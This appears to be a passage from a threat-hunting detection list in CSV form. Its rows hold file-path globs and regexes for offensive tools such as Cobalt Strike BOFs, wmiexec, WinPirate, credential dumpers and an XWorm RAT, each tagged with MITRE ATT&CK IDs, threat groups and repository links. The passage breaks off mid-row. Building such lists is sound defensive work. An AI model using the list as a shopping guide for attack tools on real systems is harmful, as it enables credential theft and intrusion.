"*/Windows-Passwords.ps1*",".{0,1000}\/Windows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*/windows-resources/hyperion*",".{0,1000}\/windows\-resources\/hyperion.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/WindowsVault.cna*",".{0,1000}\/WindowsVault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/WindowsVault.h*",".{0,1000}\/WindowsVault\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/win-enum-resources*",".{0,1000}\/win\-enum\-resources.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/WINHELLO2hashcat.py*",".{0,1000}\/WINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/WinPirate.bat*",".{0,1000}\/WinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/WinPirate.git*",".{0,1000}\/WinPirate\.git.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/WinPwn*",".{0,1000}\/WinPwn.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*/WinPwn.git*",".{0,1000}\/WinPwn\.git.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*/WinPwn_Repo*",".{0,1000}\/WinPwn_Repo.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*/WinPwnage*",".{0,1000}\/WinPwnage.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/winregistry.py**",".{0,1000}\/winregistry\.py.{0,1000}.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/winrm.cpp*",".{0,1000}\/winrm\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/winrm.py*",".{0,1000}\/winrm\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/winrmdll*",".{0,1000}\/winrmdll.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/winrm-reflective-dll/*",".{0,1000}\/winrm\-reflective\-dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/winscp_dump.py*",".{0,1000}\/winscp_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Winsocky.git*",".{0,1000}\/Winsocky\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","95","16","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*/winsos.exe*",".{0,1000}\/winsos\.exe.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*/winsos-poc.git*",".{0,1000}\/winsos\-poc\.git.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*/wireless.py*",".{0,1000}\/wireless\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/wiresocks.git*",".{0,1000}\/wiresocks\.git.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*/wmeye/*",".{0,1000}\/wmeye\/.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","331","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*/WMI Lateral Movement/*",".{0,1000}\/WMI\sLateral\sMovement\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*/wmi.dropper*",".{0,1000}\/wmi\.dropper.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/WMI/wmi.py*",".{0,1000}\/WMI\/wmi\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/wmi_exec.exe*",".{0,1000}\/wmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/wmiexec.py*",".{0,1000}\/wmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/wmiexec.py*",".{0,1000}\/wmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/wmiexec/*",".{0,1000}\/wmiexec\/.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","157","25","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*/wmiexec2.git*",".{0,1000}\/wmiexec2\.git.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*/wmiexec-Pro*",".{0,1000}\/wmiexec\-Pro.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*/wmiexec-Pro.git*",".{0,1000}\/wmiexec\-Pro\.git.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*/WMIPersistence.git*",".{0,1000}\/WMIPersistence\.git.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","2","112","29","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" "*/WMIReg.exe*",".{0,1000}\/WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/wmisploit*",".{0,1000}\/wmisploit.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*/word_list.c",".{0,1000}\/word_list\.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/word_list.h",".{0,1000}\/word_list\.h","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/wordlists/owa_directories.txt*",".{0,1000}\/wordlists\/owa_directories\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*/wordlists/skype-directories.txt*",".{0,1000}\/wordlists\/skype\-directories\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*/wordlists/top_10000.txt*",".{0,1000}\/wordlists\/top_10000\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/wordlists/top_100000.txt*",".{0,1000}\/wordlists\/top_100000\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/workflow/test/dirbscan.yaml*",".{0,1000}\/workflow\/test\/dirbscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/Worm.dll*",".{0,1000}\/Worm\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/wpaf/finder.py*",".{0,1000}\/wpaf\/finder\.py.{0,1000}","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","67","14","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" "*/wpscan.py*",".{0,1000}\/wpscan\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/wraith.git*",".{0,1000}\/wraith\.git.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith.py*",".{0,1000}\/wraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control 